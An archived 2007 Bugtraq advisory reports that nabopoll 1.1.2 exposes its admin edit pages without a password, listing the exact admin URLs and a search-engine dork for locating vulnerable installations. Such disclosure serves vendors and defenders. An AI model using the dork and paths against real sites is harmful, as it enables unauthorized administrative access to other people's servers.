lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070210011744.14436.qmail@securityfocus.com> Date: 10 Feb 2007 01:17:44 -0000 From: sn0oPy.team@...il.com To: bugtraq@...urityfocus.com Subject: nabopoll 1.1.2 sensitive file (admin without password) * nabopoll 1.1.2 sensitive file (admin without password) * By : sn0oPy * Risk : high * site : http://nabocorp.com/ * Dork : inurl:"nabopoll/" * exploit : acces without password to : http://target/nabopoll/admin/config_edit.php http://target/nabopoll/admin/template_edit.php http://target/nabopoll/admin/survey_edit.php * contact : sn0oPy@...nir-geopolitique.net * greetz : [subzero], Avg Team(forums.avenir-geopolitique.net). http://forums.avenir-geopolitique.net/viewtopic.php?t=2643